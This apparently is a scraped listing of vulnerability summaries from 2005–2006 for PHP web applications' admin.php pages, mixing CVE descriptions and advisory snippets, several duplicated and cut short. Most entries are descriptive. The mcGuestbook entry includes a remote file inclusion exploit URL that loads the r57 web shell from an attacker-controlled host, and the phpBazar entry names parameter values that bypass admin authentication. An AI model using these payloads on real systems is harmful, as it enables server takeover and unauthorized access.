CVE-2006-3323

PHP remote file inclusion vulnerability in admin/admin.php in MF Piadas 1.0 allows remote attackers to execute arbitrary PHP code via the page parameter. NOTE: the same vector can be used for cross-site scripting, but CVE analysis suggests that this is resultant from file inclusion of HTML or...

CVE-2006-3323

MF Piadas 1.0 is affected by a PHP remote file inclusion in admin/admin.php, exploitable via the page parameter to execute arbitrary code. The underlying issue is a file inclusion vulnerability (HTML/script vector noted as related by CVE analysis). Connected advisories also reference cross-site s...

file include exploits in mcGuestbook 1.3

Multiple file include exploits in mcGuestbook 1.3 script type : mcGuestbook 1.3 bug found by : sweet-devil team : site-down type : file include exploits : admin.php http://www.example.com/path/admin.php?lang=http://yoursite/r57shell.txt? ecrire.php...

file include exploits in mcGuestbook 1.3

Multiple file include exploits in mcGuestbook 1.3 script type : mcGuestbook 1.3 bug found by : sweet-devil team : site-down type : file include exploits : admin.php http://www.example.com/path/admin.php?lang=http://yoursite/r57shell.txt? ecrire.php...

Cross site scripting

Cross-site scripting XSS vulnerability in admin.php in Particle Links 1.2.2 allows remote attackers to inject arbitrary web script or HTML via the username parameter...

CVE-2006-2903

CVE-2006-2903 describes a cross-site scripting (XSS) vulnerability in Particle Links 1.2.2, specifically in admin.php where the username parameter can be exploited to inject arbitrary script/HTML. The available references (e.g., NVD entry) list a low severity (CVSS v2 base 2.6) with network attac...

CVE-2006-2903

Cross-site scripting XSS vulnerability in admin.php in Particle Links 1.2.2 allows remote attackers to inject arbitrary web script or HTML via the username parameter...

BloggIT <= 1.01 (admin.php) Arbitrary code execution

/ Federico Fazzi, [email protected] / BloggIT = 1.01 admin.php Arbitrary code execution / 04/06/2006 5:48 Bug: The BloggIT have on the admin.php: require"session.inc.php"; //- sessionstart; //- if $SESSION'login' != "ok" header"Location: index.php"; and require function don't include the fil...

CVE-2005-2466

OpenBook 1.2.2 is affected by multiple SQL injection vulnerabilities in the auth_user function of admin.php, allowing remote attackers to execute arbitrary SQL commands via the (1) username or (2) password parameter. The vulnerability is detailed in CVE-2005-2466 with a NVD base score of 6.4 (MED...

PT-2006-3777 · Mybloggie · Mybloggie

Name of the Vulnerable Software and Affected Versions: MyBloggie versions 2.1.1 and earlier Description: A remote file inclusion issue allows remote attackers to execute arbitrary PHP code via a URL in the mybloggie root path parameter to admin.php. The issue's validity has been disputed, with so...

CVE-2006-2726

PHP remote file inclusion vulnerability in Fastpublish CMS 1.6.9.d allows remote attackers to include arbitrary files via the configfsBase parameter in 1 drucken.php, 2 drucken2.php, 3 emailanbenutzer.php, 4 rechnung.php, 5 suche/search.php and 6 adminbereich/admin.php...

Remote file inclusion

PHP remote file inclusion vulnerability in Fastpublish CMS 1.6.9.d allows remote attackers to include arbitrary files via the configfsBase parameter in 1 drucken.php, 2 drucken2.php, 3 emailanbenutzer.php, 4 rechnung.php, 5 suche/search.php and 6 adminbereich/admin.php...

CVE-2006-2635

Multiple cross-site scripting XSS vulnerabilities in Tikiwiki aka Tiki CMS/Groupware 1.9.x allow remote attackers to inject arbitrary web script or HTML via malformed nested HTML tags such as "ipt" in 1 offset and 2 days parameters in a tiki-lastchanges.php, the 3 find and 4 offset parameters in ...

CVE-2006-2566

Alstrasoft Article Manager Pro 1.6 allows remote attackers to obtain sensitive information via 1 a quote character or possibly an invalid value in the action parameter in a request to mrarticles.php or 2 a login QUERYSTRING to admin.php without any additional parameters, which reveal the path in...

CVE-2006-2527

CVE-2006-2527 affects phpBazar 2.1.0 and earlier. The vulnerability in Admin/admin.php allows remote attackers to bypass authentication and gain unauthorized access to the administrative section by setting the action parameter to edit_member and the value parameter to 1. The description indicates...

BoastMachine 3.1 - admin.php Cross-Site Scripting

BoastMachine 3.1 - admin.php Cross-Site Scripting source: https://www.securityfocus.com/bid/18012/info BoastMachine is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to have arbitrary script code execute...

Design/Logic Flaw

PlaNet Concept plaNetStat 20050127 allows remote attackers to gain administrative privileges, and view and configure log files, via a direct request to the 1 admin.php or 2 settings.php page...

Cross site scripting

Multiple cross-site scripting XSS vulnerabilities in FarsiNews 2.5.3 Pro and earlier allow remote attackers to inject arbitrary web script or HTML via the 1 month and 2 year parameters in a index.php, and the 3 mod parameter in b admin.php...

CVE-2006-2091

admin.php in Virtual War VWar 1.5 and versions before 1.2 allows remote attackers to obtain sensitive information via an invalid vwarroot parameter, which reveals the path in an error message...

CVE-2006-2084

Multiple cross-site scripting XSS vulnerabilities in FarsiNews 2.5.3 Pro and earlier allow remote attackers to inject arbitrary web script or HTML via the 1 month and 2 year parameters in a index.php, and the 3 mod parameter in b admin.php...